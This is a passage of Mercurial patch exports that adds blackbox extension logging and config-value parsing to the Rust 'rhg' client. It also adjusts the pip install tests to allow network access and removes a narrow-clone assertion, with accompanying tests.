crate::requirements; use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; @@ -38,8 +38,8 @@ /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] -pub(crate) struct Vfs<'a> { - base: &'a Path, +pub struct Vfs<'a> { + pub(crate) base: &'a Path, } impl Repo { @@ -196,12 +196,12 @@ /// For accessing repository files (in `.hg`), except for the store /// (`.hg/store`). - pub(crate) fn hg_vfs(&self) -> Vfs<'_> { + pub fn hg_vfs(&self) -> Vfs<'_> { Vfs { base: &self.dot_hg } } /// For accessing repository store files (in `.hg/store`) - pub(crate) fn store_vfs(&self) -> Vfs<'_> { + pub fn store_vfs(&self) -> Vfs<'_> { Vfs { base: &self.store } } @@ -209,7 +209,7 @@ // The undescore prefix silences the "never used" warning. Remove before // using. - pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> { + pub fn _working_directory_vfs(&self) -> Vfs<'_> { Vfs { base: &self.working_directory, } @@ -217,26 +217,38 @@ } impl Vfs<'_> { - pub(crate) fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { self.base.join(relative_path) } - pub(crate) fn read( + pub fn read( &self, relative_path: impl AsRef<Path>, ) -> Result<Vec<u8>, HgError> { let path = self.join(relative_path); - std::fs::read(&path).for_file(&path) + std::fs::read(&path).when_reading_file(&path) } - pub(crate) fn mmap_open( + pub fn mmap_open( &self, relative_path: impl AsRef<Path>, ) -> Result<Mmap, HgError> { let path = self.base.join(relative_path); - let file = std::fs::File::open(&path).for_file(&path)?; + let file = std::fs::File::open(&path).when_reading_file(&path)?; // TODO: what are the safety requirements here? - let mmap = unsafe { MmapOptions::new().map(&file) }.for_file(&path)?; + let mmap = unsafe { MmapOptions::new().map(&file) } + .when_reading_file(&path)?; Ok(mmap) } + + pub fn rename( + &self, + relative_from: impl AsRef<Path>, + relative_to: impl AsRef<Path>, + ) -> Result<(), HgError> { + let from = self.join(relative_from); + let to = self.join(relative_to); + std::fs::rename(&from, &to) + .with_context(|| IoErrorContext::RenamingFile { from, to }) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613563225 -3600 # Wed Feb 17 13:00:25 2021 +0100 # Node ID 36f3a64846c8cb997888132eceab38f78cc9cdc0 # Parent 1f55cd5b292f5223977ccbff02ff6647f9063f2a blackbox: Remove misleading quotes in config example This example previously looked like quotes were part of configuration file syntax, and the parsed `date-format` value was the part inside of them. This is not the case: config syntax only parses quotes in list values. Instead using that config would result in literal quotes being written to `.hg/blackbox.log` as part of the date format. This changes the example to what was probably intended. Differential Revision: https://phab.mercurial-scm.org/D10011 diff --git a/hgext/blackbox.py b/hgext/blackbox.py --- a/hgext/blackbox.py +++ b/hgext/blackbox.py @@ -38,7 +38,7 @@ [blackbox] # Include nanoseconds in log entries with %f (see Python function # datetime.datetime.strftime) - date-format = '%Y-%m-%d @ %H:%M:%S.%f' + date-format = %Y-%m-%d @ %H:%M:%S.%f """ # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613477317 -3600 # Tue Feb 16 13:08:37 2021 +0100 # Node ID 755c31a1caf9ec7786fee84fa7c05205f5c4587f # Parent 36f3a64846c8cb997888132eceab38f78cc9cdc0 rhg: Add support for the blackbox extension Only `command` and `commandfinish` events are logged. The `dirty`, `logsource`, `track` and `ignore` configuration items are not supported yet. To indicate commands executed without Python, a `(rust) ` prefix is added in corresponding log messages. Differential Revision: https://phab.mercurial-scm.org/D10012 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -91,6 +91,18 @@ source = "registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "chrono" +version = "0.4.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", + "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -467,6 +479,15 @@ ] [[package]] +name = "num-integer" +version = "0.1.44" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -715,6 +736,7 @@ name = "rhg" version = "0.1.0" dependencies = [ + "chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)", "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", @@ -722,6 +744,7 @@ "hg-core 0.1.0", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", ] [[package]] @@ -856,6 +879,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index" [[package]] +name = "users" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -949,6 +981,7 @@ "checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" "checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" "checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" +"checksum chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)" = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" "checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" "checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" "checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" @@ -988,6 +1021,7 @@ "checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" "checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" "checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" +"checksum num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" "checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" "checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" "checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" @@ -1035,6 +1069,7 @@ "checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" "checksum unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" "checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" +"checksum users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" "checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" "checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" "checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -26,6 +26,14 @@ Vec<(&'a HgPath, &'a HgPath)>, ); +pub fn parse_dirstate_parents( + contents: &[u8], +) -> Result<&DirstateParents, HgError> { + let (parents, _rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + Ok(parents) +} + #[timed] pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> { let mut copies = Vec::new(); diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -214,6 +214,15 @@ base: &self.working_directory, } } + + pub fn dirstate_parents( + &self, + ) -> Result<crate::dirstate::DirstateParents, HgError> { + let dirstate = self.hg_vfs().mmap_open("dirstate")?; + let parents = + crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?; + Ok(parents.clone()) + } } impl Vfs<'_> { diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -188,6 +188,35 @@ } } +#[cfg(unix)] +pub fn shell_quote(value: &[u8]) -> Vec<u8> { + // TODO: Use the `matches!` macro when we require Rust 1.42+ + if value.iter().all(|&byte| match byte { + b'a'..=b'z' + | b'A'..=b'Z' + | b'0'..=b'9' + | b'.' + | b'_' + | b'/' + | b'+' + | b'-' => true, + _ => false, + }) { + value.to_owned() + } else { + let mut quoted = Vec::with_capacity(value.len() + 2); + quoted.push(b'\''); + for &byte in value { + if byte == b'\'' { + quoted.push(b'\\'); + } + quoted.push(byte); + } + quoted.push(b'\''); + quoted + } +} + pub fn current_dir() -> Result<std::path::PathBuf, HgError> { std::env::current_dir().map_err(|error| HgError::IoError { error, diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -9,9 +9,11 @@ [dependencies] hg-core = { path = "../hg-core"} +chrono = "0.4.19" clap = "2.33.1" derive_more = "0.99" log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" format-bytes = "0.2.0" +users = "0.11.0" diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/blackbox.rs @@ -0,0 +1,161 @@ +//! Logging for repository events, including commands run in the repository. + +use crate::CliInvocation; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::Repo; +use hg::utils::{files::get_bytes_from_os_str, shell_quote}; + +const ONE_MEBIBYTE: u64 = 1 << 20; + +// TODO: somehow keep defaults in sync with `configitem` in `hgext/blackbox.py` +const DEFAULT_MAX_SIZE: u64 = ONE_MEBIBYTE; +const DEFAULT_MAX_FILES: u32 = 7; + +// Python does not support %.3f, only %f +const DEFAULT_DATE_FORMAT: &str = "%Y/%m/%d %H:%M:%S%.3f"; + +type DateTime = chrono::DateTime<chrono::Local>; + +pub struct ProcessStartTime { + /// For measuring duration + monotonic_clock: std::time::Instant, + /// For formatting with year, month, day, etc. + calendar_based: DateTime, +} + +impl ProcessStartTime { + pub fn now() -> Self { + Self { + monotonic_clock: std::time::Instant::now(), + calendar_based: chrono::Local::now(), + } + } +} + +pub struct Blackbox<'a> { + process_start_time: &'a ProcessStartTime, + /// Do nothing if this is `None` + configured: Option<ConfiguredBlackbox<'a>>, +} + +struct ConfiguredBlackbox<'a> { + repo: &'a Repo, + max_size: u64, + max_files: u32, + date_format: &'a str, +} + +impl<'a> Blackbox<'a> { + pub fn new( + invocation: &'a CliInvocation<'a>, + process_start_time: &'a ProcessStartTime, + ) -> Result<Self, HgError> { + let configured = if let Ok(repo) = invocation.repo { + let config = invocation.config(); + if config.get(b"extensions", b"blackbox").is_none() { + // The extension is not enabled + None + } else { + Some(ConfiguredBlackbox { + repo, + max_size: config + .get_byte_size(b"blackbox", b"maxsize")? + .unwrap_or(DEFAULT_MAX_SIZE), + max_files: config + .get_u32(b"blackbox", b"maxfiles")? + .unwrap_or(DEFAULT_MAX_FILES), + date_format: config + .get_str(b"blackbox", b"date-format")? + .unwrap_or(DEFAULT_DATE_FORMAT), + }) + } + } else { + // Without a local repository there’s no `.hg/blackbox.log` to + // write to. + None + }; + Ok(Self { + process_start_time, + configured, + }) + } + + pub fn log_command_start(&self) { + if let Some(configured) = &self.configured { + let message = format_bytes!(b"(rust) {}", format_cli_args()); + configured.log(&self.process_start_time.calendar_based, &message); + } + } + + pub fn log_command_end(&self, exit_code: i32) { + if let Some(configured) = &self.configured { + let now = chrono::Local::now(); + let duration = self + .process_start_time + .monotonic_clock + .elapsed() + .as_secs_f64(); + let message = format_bytes!( + b"(rust) {} exited {} after {} seconds", + format_cli_args(), + exit_code, + format_bytes::Utf8(format_args!("{:.03}", duration)) + ); + configured.log(&now, &message); + } + } +} + +impl ConfiguredBlackbox<'_> { + fn log(&self, date_time: &DateTime, message: &[u8]) { + let date = format_bytes::Utf8(date_time.format(self.date_format)); + let user = users::get_current_username().map(get_bytes_from_os_str); + let user = user.as_deref().unwrap_or(b"???"); + let rev = format_bytes::Utf8(match self.repo.dirstate_parents() { + Ok(parents) if parents.p2 == hg::revlog::node::NULL_NODE => { + format!("{:x}", parents.p1) + } + Ok(parents) => format!("{:x}+{:x}", parents.p1, parents.p2), + Err(_dirstate_corruption_error) => { + // TODO: log a non-fatal warning to stderr + "???".to_owned() + } + }); + let pid = std::process::id(); + let line = format_bytes!( + b"{} {} @{} ({})> {}\n", + date, + user, + rev, + pid, + message + ); + let result = + hg::logging::LogFile::new(self.repo.hg_vfs(), "blackbox.log") + .max_size(Some(self.max_size)) + .max_files(self.max_files) + .write(&line); + match result { + Ok(()) => {} + Err(_io_error) => { + // TODO: log a non-fatal warning to stderr + } + } + } +} + +fn format_cli_args() -> Vec<u8> { + let mut args = std::env::args_os(); + let _ = args.next(); // Skip the first (or zeroth) arg, the name of the `rhg` executable + let mut args = args.map(|arg| shell_quote(&get_bytes_from_os_str(arg))); + let mut formatted = Vec::new(); + if let Some(arg) = args.next() { + formatted.extend(arg) + } + for arg in args { + formatted.push(b' '); + formatted.extend(arg) + } + formatted +} diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -9,6 +9,7 @@ use hg::repo::{Repo, RepoError}; use std::path::{Path, PathBuf}; +mod blackbox; mod error; mod exitcode; mod ui; @@ -36,7 +37,10 @@ ) } -fn main_with_result(ui: &ui::Ui) -> Result<(), CommandError> { +fn main_with_result( + ui: &ui::Ui, + process_start_time: &blackbox::ProcessStartTime, +) -> Result<(), CommandError> { env_logger::init(); let app = App::new("rhg") .setting(AppSettings::AllowInvalidUtf8) @@ -83,35 +87,47 @@ Err(error) => return Err(error.into()), }; - run(&CliInvocation { + let invocation = CliInvocation { ui, subcommand_args, non_repo_config, repo: repo.as_ref(), - }) + }; + let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; + blackbox.log_command_start(); + let result = run(&invocation); + blackbox.log_command_end(exit_code(&result)); + result } fn main() { + // Run this first, before we find out if the blackbox extension is even + // enabled, in order to include everything in-between in the duration + // measurements. Reading config files can be slow if they’re on NFS. + let process_start_time = blackbox::ProcessStartTime::now(); + let ui = ui::Ui::new(); - let exit_code = match main_with_result(&ui) { + let result = main_with_result(&ui, &process_start_time); + if let Err(CommandError::Abort { message }) = &result { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + std::process::exit(exit_code(&result)) +} + +fn exit_code(result: &Result<(), CommandError>) -> i32 { + match result { Ok(()) => exitcode::OK, + Err(CommandError::Abort { .. }) => exitcode::ABORT, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, - - Err(CommandError::Abort { message }) => { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = - ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); - } - exitcode::ABORT - } - }; - std::process::exit(exit_code) + } } macro_rules! subcommands { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -261,3 +261,15 @@ $ rhg cat -r 0 a a +The blackbox extension is supported + + $ echo "[extensions]" >> $HGRCPATH + $ echo "blackbox =" >> $HGRCPATH + $ echo "[blackbox]" >> $HGRCPATH + $ echo "maxsize = 1" >> $HGRCPATH + $ rhg files > /dev/null + $ cat .hg/blackbox.log + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) + $ cat .hg/blackbox.log.1 + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob) + # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613589844 -3600 # Wed Feb 17 20:24:04 2021 +0100 # Node ID a687a7f27951a0955684b2eaa5177a3997d539b9 # Parent 755c31a1caf9ec7786fee84fa7c05205f5c4587f rust: Move config value parsing functions to a new module Differential Revision: https://phab.mercurial-scm.org/D10021 diff --git a/rust/hg-core/src/config.rs b/rust/hg-core/src/config.rs --- a/rust/hg-core/src/config.rs +++ b/rust/hg-core/src/config.rs @@ -11,5 +11,6 @@ mod config; mod layer; +mod values; pub use config::{Config, ConfigValueParseError}; pub use layer::{ConfigError, ConfigParseError}; diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,6 +8,7 @@ // GNU General Public License version 2 or any later version. use super::layer; +use super::values; use crate::config::layer::{ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; @@ -64,40 +65,6 @@ pub expected_type: &'static str, } -pub fn parse_bool(v: &[u8]) -> Option<bool> { - match v.to_ascii_lowercase().as_slice() { - b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), - b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), - _ => None, - } -} - -pub fn parse_byte_size(value: &[u8]) -> Option<u64> { - let value = str::from_utf8(value).ok()?.to_ascii_lowercase(); - const UNITS: &[(&str, u64)] = &[ - ("g", 1 << 30), - ("gb", 1 << 30), - ("m", 1 << 20), - ("mb", 1 << 20), - ("k", 1 << 10), - ("kb", 1 << 10), - ("b", 1 << 0), // Needs to be last - ]; - for &(unit, multiplier) in UNITS { - // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ - if value.ends_with(unit) { - let value_before_unit = &value[..value.len() - unit.len()]; - let float: f64 = value_before_unit.trim().parse().ok()?; - if float >= 0.0 { - return Some((float * multiplier as f64).round() as u64); - } else { - return None; - } - } - } - value.parse().ok() -} - impl Config { /// Load system and user configuration from various files. /// @@ -324,7 +291,7 @@ section: &[u8], item: &[u8], ) -> Result<Option<u64>, ConfigValueParseError> { - self.get_parse(section, item, "byte quantity", parse_byte_size) + self.get_parse(section, item, "byte quantity", values::parse_byte_size) } /// Returns an `Err` if the first value found is not a valid boolean. @@ -335,7 +302,7 @@ section: &[u8], item: &[u8], ) -> Result<Option<bool>, ConfigValueParseError> { - self.get_parse(section, item, "boolean", parse_bool) + self.get_parse(section, item, "boolean", values::parse_bool) } /// Returns the corresponding boolean in the config. Returns `Ok(false)` diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/config/values.rs @@ -0,0 +1,43 @@ +//! Parsing functions for various type of configuration values. +//! +//! Returning `None` indicates a syntax error. Using a `Result` would be more +//! correct but would take more boilerplate for converting between error types, +//! compared to using `.ok()` on inner results of various error types to +//! convert them all to options. The `Config::get_parse` method later converts +//! those options to results with `ConfigValueParseError`, which contains +//! details about where the value came from (but omits details of what’s +//! invalid inside the value). + +pub(super) fn parse_bool(v: &[u8]) -> Option<bool> { + match v.to_ascii_lowercase().as_slice() { + b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), + b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), + _ => None, + } +} + +pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613590819 -3600 # Wed Feb 17 20:40:19 2021 +0100 # Node ID 1b7c0b10d93015d99bffd884015be2a4d61b5640 # Parent a687a7f27951a0955684b2eaa5177a3997d539b9 rust: Add some unit tests for parse_byte_size in config Differential Revision: https://phab.mercurial-scm.org/D10022 diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs --- a/rust/hg-core/src/config/values.rs +++ b/rust/hg-core/src/config/values.rs @@ -41,3 +41,21 @@ } value.parse().ok() } + +#[test] +fn test_parse_byte_size() { + assert_eq!(parse_byte_size(b""), None); + assert_eq!(parse_byte_size(b"b"), None); + + assert_eq!(parse_byte_size(b"12"), Some(12)); + assert_eq!(parse_byte_size(b"12b"), Some(12)); + assert_eq!(parse_byte_size(b"12 b"), Some(12)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); + assert_eq!(parse_byte_size(b"1.1 K"), Some(1126)); + assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126)); + + assert_eq!(parse_byte_size(b"-12 b"), None); + assert_eq!(parse_byte_size(b"-0.1 b"), None); + assert_eq!(parse_byte_size(b"0.1 b"), Some(0)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); +} # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1612477415 -3600 # Thu Feb 04 23:23:35 2021 +0100 # Node ID ad107ed7a4aa23fad1fb9da570ee0f872269fff2 # Parent 1b7c0b10d93015d99bffd884015be2a4d61b5640 ci: test real dependency installation for pip In the past, the pip smoke test inhibited actual dependency installation, but that fails in different environments for setuptools itself. Since it isn't what we actually want to test (which is pip install), allow this to call home, if HGTESTS_ALLOW_NETIO=1 is set in the environment. Differential Revision: https://phab.mercurial-scm.org/D9950 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -702,6 +702,12 @@ return os.path.isdir(os.path.join(t, "..", ".hg")) +@check("network-io", "whether tests are allowed to access 3rd party services") +def has_test_repo(): + t = os.environ.get("HGTESTS_ALLOW_NETIO") + return t == "1" + + @check("curses", "terminfo compiler and curses module") def has_curses(): try: diff --git a/tests/test-install.t b/tests/test-install.t --- a/tests/test-install.t +++ b/tests/test-install.t @@ -184,7 +184,7 @@ $ cd $TESTTMP $ unset PYTHONPATH -#if py3 ensurepip +#if py3 ensurepip network-io $ "$PYTHON" -m venv installenv >> pip.log Hack: Debian does something a bit different in ensurepip.bootstrap. This makes @@ -197,8 +197,10 @@ Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log Failed building wheel for mercurial (?) + WARNING: You are using pip version *; however, version * is available. (glob) (?) + You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?) $ ./installenv/*/hg debuginstall || cat pip.log checking encoding (ascii)... checking Python executable (*) (glob) @@ -222,17 +224,17 @@ no problems detected #endif -#if virtualenv no-py3 +#if virtualenv no-py3 network-io Note: --no-site-packages is the default for all versions enabled by hghave - $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log + $ "$PYTHON" -m virtualenv installenv >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) Note: we use this weird path to run pip and hg to avoid platform differences, since it's bin on most platforms but Scripts on Windows. - $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log + $ ./installenv/*/pip install $TESTDIR/.. >> pip.log DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?) DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?) DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614149726 28800 # Tue Feb 23 22:55:26 2021 -0800 # Node ID 946a07f0890630fc960395a90f5ff718d3aad01d # Parent ad107ed7a4aa23fad1fb9da570ee0f872269fff2 tests: demonstrate assertion error when modifying working copy while narrowing Differential Revision: https://phab.mercurial-scm.org/D10062 diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -509,3 +509,11 @@ deleting meta/d0/00manifest.i (tree !) deleting meta/d2/00manifest.i (tree !) $ ls .hg/strip-backup/ + + +Test removing include while concurrently modifying file in that path + $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ + > --include d0 --include d1 + $ cd narrow-concurrent-modify + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 2>&1 | grep AssertionError + AssertionError # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614149910 28800 # Tue Feb 23 22:58:30 2021 -0800 # Node ID ced66295ea90fc0ba66da3c5d616e975289ae5eb # Parent 946a07f0890630fc960395a90f5ff718d3aad01d narrow: remove assertion about working copy being clean The user can always modify the working copy, including while they're running `hg tracked --remove-include <path>`. Nothing really bad happens when they do that, and we already have code for printing a nice warning, so we can safely remove the assertion we had. Differential Revision: https://phab.mercurial-scm.org/D10063 diff --git a/mercurial/narrowspec.py b/mercurial/narrowspec.py --- a/mercurial/narrowspec.py +++ b/mercurial/narrowspec.py @@ -329,7 +329,6 @@ trackeddirty = status.modified + status.added clean = status.clean if assumeclean: - assert not trackeddirty clean.extend(lookup) else: trackeddirty.extend(lookup) diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -515,5 +515,10 @@ $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ > --include d0 --include d1 $ cd narrow-concurrent-modify - $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 2>&1 | grep AssertionError - AssertionError + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 + comparing with ssh://user@dummy/master + searching for changes + looking for local changes to affected paths + deleting data/d0/f.i + deleting meta/d0/00manifest.i (tree !) + not deleting possibly dirty file d0/f # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612398790 28800 # Wed Feb 03 16:33:10 2021 -0800 # Node ID e9901d01d135647cf7bf518aa30a03a4088b067b # Parent 